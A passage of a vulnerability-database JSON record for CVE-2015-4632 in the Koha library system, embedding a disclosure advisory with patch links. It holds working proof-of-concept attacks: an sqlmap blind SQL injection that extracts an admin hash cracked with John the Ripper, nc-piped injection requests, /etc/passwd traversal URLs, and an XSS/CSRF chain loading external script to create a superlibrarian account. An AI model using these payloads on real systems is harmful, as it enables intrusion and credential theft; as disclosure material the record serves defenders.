--sql-shell parameter and input the query:\n\n\u00a0 \u00a0root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0_\n\u00a0 \u00a0 ___ ___| |_____ ___ ___ \u00a0{1.0-dev-nongit-20150513}\n\u00a0 \u00a0|_ -| . | | \u00a0 \u00a0 | .\u0027| . |\n\u00a0 \u00a0|___|_ \u00a0|_|_|_|_|__,| \u00a0_|\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0|_| \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |_| \u00a0 http://sqlmap.org\n\n\n\u00a0 \u00a0[!] 
legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0027s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n\u00a0 \u00a0[*] starting at 09:20:07\n\n\n\u00a0 \u00a0[09:20:07] [INFO] testing connection to the target URL\n\u00a0 \u00a0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n\u00a0 \u00a0---\n\u00a0 \u00a0Parameter: number (GET)\n\u00a0 \u00a0 \u00a0 \u00a0Type: AND/OR time-based blind\n\u00a0 \u00a0 \u00a0 \u00a0Title: MySQL \u003e= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)\n\u00a0 \u00a0 \u00a0 \u00a0Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)\n\u00a0 \u00a0---\n\u00a0 \u00a0[09:20:09] [INFO] testing MySQL\n\u00a0 \u00a0[09:20:09] [INFO] confirming MySQL\n\u00a0 \u00a0[09:20:09] [INFO] the back-end DBMS is MySQL\n\u00a0 \u00a0web server operating system: Linux Debian\n\u00a0 \u00a0web application technology: Apache 2.4.10\n\u00a0 \u00a0back-end DBMS: MySQL \u003e= 5.0.0\n\u00a0 \u00a0[09:20:09] [INFO] calling MySQL shell. To quit type \u0027x\u0027 or \u0027q\u0027 and press ENTER\n\n\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\u00a0 \u00a0[09:20:25] [INFO] fetching SQL SELECT statement query output: \u0027select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1\u0027\n\u00a0 \u00a0[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind\n\u00a0 \u00a0[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. 
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\n\u00a0 \u00a0[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors\u00a0\n\u00a0 \u00a0admin\n\u00a0 \u00a0[09:21:46] [INFO] retrieved: $2a$08$taQ\n\u00a0 \u00a0[09:23:33] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:23:33] [WARNING] increasing time delay to 5 seconds\u00a0\n\u00a0 \u00a0afOgEEhU\n\u00a0 \u00a0[09:25:10] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:25:10] [WARNING] increasing time delay to 6 seconds\u00a0\n\u00a0 \u00a0t/gW\n\u00a0 \u00a0[09:26:13] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:26:13] [WARNING] increasing time delay to 7 seconds\u00a0\n\u00a0 \u00a0TOmqnYe1Y6ZNxCENa\n\u00a0 \u00a0[09:29:57] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:29:57] [WARNING] increasing time delay to 8 seconds\u00a0\n\u00a0 \u00a02.ONk2eZhnuEw5z9OjjxS\n\u00a0 \u00a0[09:35:08] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:35:08] [WARNING] increasing time delay to 9 seconds\u00a0\n\n\u00a0 \u00a0select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: \u00a0 \u00a0\n\u00a0 \u00a0\u0027admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\u0027\n\n3. 
Feed john the ripper and be lucky\n\n\u00a0 \u00a0root@kali:/home/wicked# echo \"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\" \u003e ./admin-pass\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass\u00a0\n\u00a0 \u00a0Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])\n\u00a0 \u00a0admin \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(?)\n\u00a0 \u00a0guesses: 1 \u00a0time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) \u00a0c/s: 260 \u00a0trying: Smokey - allstate\n\u00a0 \u00a0Use the \"--show\" option to display all of the cracked passwords reliably\n\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass --show\n\u00a0 \u00a0?:admin\n\n\u00a0 \u00a01 password hash cracked, 0 left\n\n4. If the webserver is misconfigured, read \u0026 write access to the filesystem may be possible. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n====================================================================\n1. 
\"Criteria\" Parameter, Payload: ELT(1=1,\u0027evil\u0027) / ELT(1=2,\u0027evil\u0027)\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=2,\u0027evil\u0027)\" | nc testbox 9002\n\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=1,\u0027evil\u0027)\" | nc testbox 9002\n\n====================================================================\n2. 
\"Filter\" Parameter, Payload: P_COM\u0027+AND+\u0027a\u0027=\u0027a / P_COM\u0027+AND+\u0027a\u0027=\u0027b\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027a\" | nc testbox 9002\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027b\" | nc testbox 9002\n\n====================================================================\n\nYou will notice different output in every second request, demonstrating the evaluation of the payload. \n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n3. 
\n\nReferences\n----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nThe following input is used to print out /etc/passwd:\n\n/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n4. The site also lacks in the implementation of challenge tokens that prevent cross-site\u00a0\nforgery (XSRF) attacks. \u00a0\n\nThe attack can be performed by:\n\n- through a compromised user account. 
User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)\n- through a user clicking a malicious link (phishing mail, forum link etc.)\n\nThe following pages are affected by stored XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl\n/cgi-bin/koha/virtualshelves/shelves.pl\n\nThe following pages are affected by reflective XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl \t\t\t\t(parameters: \"direction\", \"display\")\n/cgi-bin/koha/opac-search.pl \t\t\t\t        (parameters: \"tag\")\n/cgi-bin/koha/authorities/authorities-home.pl \t\t(parameters: \"value\")\u00a0\n/cgi-bin/koha/acqui/lateorders.pl \t\t\t        (parameters: \"delay\")\n/cgi-bin/koha/admin/auth_subfields_structure.pl \t(parameters: \"authtypecode\",\"tagfield\")\n/cgi-bin/koha/admin/marc_subfields_structure.pl\t(parameters: \"tagfield\")\n/cgi-bin/koha/catalogue/search.pl\t\t\t        (parameters: \"limit\")\n/cgi-bin/koha/serials/serials-search.pl\t\t\t(parameters: \"bookseller_filter\", \"callnumber_filter\", \"EAN_filter\", \"ISSN_filter\", \"publisher_filter\", \"title_filter\")\u00a0\n/cgi-bin/koha/suggestion/suggestion.pl \t\t\t(parameters: \"author\", \"collectiontitle\", \"copyrightdate\", \"isbn\", \"manageddate_from\", \"manageddate_to\", \"publishercode\", \n                                                                                                        \"suggesteddate_from\", \"suggesteddate_to\")\n\nImpact\n----------\nThe vulnerabilities allow remote attackers to inject arbitrary web script or HTML in order to:\n\n- escalate privileges by targeting staff members with XSRF\u00a0\n- target users via browser exploits\n- target the webserver by combining with other server-side vulnerabilities. 
\u00a0\n\nReferences\n----------------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\n# ################################################################################################## #\n# PoC / Attack Scenario: \t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nAlice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:\n\n--\u003e http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=Malicious+Input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0\n\nBob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens\u00a0\n\n--\u003e http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl\n\nthe malicious code gets executed. The code can then perform any unauthorized actions with the permissions of user bob. 
For example:\n\nCreate new user:\n-----------------------\n\n--\u003e http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026B_address=\u0026B_address2=\u0026B_city=\u0026B_state=\u0026B_zipcode=\u0026B_country=\u0026B_phone=\u0026B_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress\u0026category_type=A\u0026updtype=I\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2F06%2F2000\u0026address=fictional\u0026select_city=%7C%7C%7C\u0026cardnumber=9182734629182364\u0026branchcode=MAURES\u0026categorycode=P_COM\u0026dateenrolled=24%2F06%2F2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=PROFESSION\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=Save\u0026setting_extended_patron_attributes=1\n\nGive the new user superlibrarian permission:\n----------------------------------------------------------\n\n--\u003e http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian\n\nThe attacker can now log in as superlibrarian. \n\nSide Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of clicking the malicious link. 
\nAlice needs to have access to the OPAC interface and to have permissions to create public lists. \n\n# ################################################################################################## #\n# PoC / Attack Scenario End\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n\n\n\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-4632"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      }
    ],
    "trust": 4.77
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=37388",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "75426",
        "trust": 3.9
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4632",
        "trust": 2.9
      },
      {
        "db": "PACKETSTORM",
        "id": "132458",
        "trust": 1.8
      },
      {
        "db": "EXPLOIT-DB",
        "id": "37388",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-4632",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "id": "VAR-201810-0025",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ],
    "trust": 3.5804196
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 3.0
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:48.381000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug 14408",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
      },
      {
        "title": "Koha 3.14.16 released",
        "trust": 0.8,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "title": "Security Release - Koha 3.16.12",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "title": "Security Release - Koha 3.18.8",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "title": "Security Release - Koha 3.20.1",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "title": "Koha directory traversal vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62257"
      },
      {
        "title": "Patch for Koha cross-site request forgery vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62260"
      },
      {
        "title": "Koha HTML Injection Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62258"
      },
      {
        "title": "Patch for Koha Cross-Site Scripting Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62259"
      },
      {
        "title": "Patch for Koha SQL Injection Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62255"
      },
      {
        "title": "Kenzer Templates [5170] [DEPRECATED]",
        "trust": 0.1,
        "url": "https://github.com/ARPSyndicate/kenzer-templates "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.6,
        "url": "http://www.securityfocus.com/bid/75426"
      },
      {
        "trust": 2.5,
        "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
      },
      {
        "trust": 2.1,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
      },
      {
        "trust": 1.8,
        "url": "https://www.exploit-db.com/exploits/37388/"
      },
      {
        "trust": 1.8,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "trust": 1.8,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "trust": 1.8,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "trust": 1.7,
        "url": "https://seclists.org/fulldisclosure/2015/jun/80"
      },
      {
        "trust": 1.7,
        "url": "https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4632"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4632"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/22.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026b_address=\u0026b_address2=\u0026b_city=\u0026b_state=\u0026b_zipcode=\u0026b_country=\u0026b_phone=\u0026b_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress\u0026category_type=a\u0026updtype=i\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2f06%2f2000\u0026address=fictional\u0026select_city=%7c%7c%7c\u0026cardnumber=9182734629182364\u0026branchcode=maures\u0026categorycode=p_com\u0026dateenrolled=24%2f06%2f2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=profession\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=save\u0026setting_extended_patron_attributes=1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4631"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian"
      },
      {
        "trust": 0.1,
        "url": "http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians"
      },
      {
        "trust": 0.1,
        "url": "http://www.koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl"
      },
      {
        "trust": 0.1,
        "url": "http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=malicious+input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4633"
      },
      {
        "trust": 0.1,
        "url": "http://sqlmap.org"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2018-10-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-02-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "date": "2015-06-26T23:02:22",
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      },
      {
        "date": "2018-10-18T21:29:01.333000",
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
